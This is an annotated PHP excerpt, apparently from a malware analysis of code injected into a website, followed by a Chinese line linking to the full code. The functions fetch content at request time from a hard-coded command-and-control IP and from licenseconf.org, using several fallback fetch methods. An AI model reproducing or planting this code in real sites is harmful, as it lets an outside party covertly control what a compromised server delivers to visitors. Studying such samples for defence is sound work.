function get_url_999($url)
{
    $content = "";
    $content = @trycurl_999($url);
    if ($content !== false) return $content;
    $content = @tryfile_999($url);
    if ($content !== false) return $content;
    $content = @tryfopen_999($url);
    if ($content !== false) return $content;
    $content = @tryfsockopen_999($url);
    if ($content !== false) return $content;
    $content = @tryfsockopen_999($url);
    if ($content !== false) return $content;
    $content = @try_file_get_contents_999($url);
    if ($content !== false) return $content;
    return '';
}



     //Counterpart of download_stuff_from_server(): builds http://<C2 IP>/www.<host>/<query>
     //and fetches it. A different hard-coded C2 address than the first variant.
     function get_cont(){
        $gendomain = "84.19.188.43"; //hard-coded command-and-control address
        $page = $_SERVER['QUERY_STRING'];
        $ho = $_SERVER['SERVER_NAME'];
        $findme = "www.";
        $pos1 = stripos($ho, $findme);
        if ($pos1 === false) {
        $ho = "www.".$ho;
        }
            $path = "http://$gendomain/$ho/$page";
            return get_url_999($path);
    }

    //Fetches a domain name from a third-party host at request time; this is the
    //"reference to another website" mentioned in the text.
    function func_current_shop_domain(){
            return get_url_999('http://licenseconf.org/show_links/show_domain_name.txt');
    }

https://who.is/domain-history/mimia.berlin上的完整代码。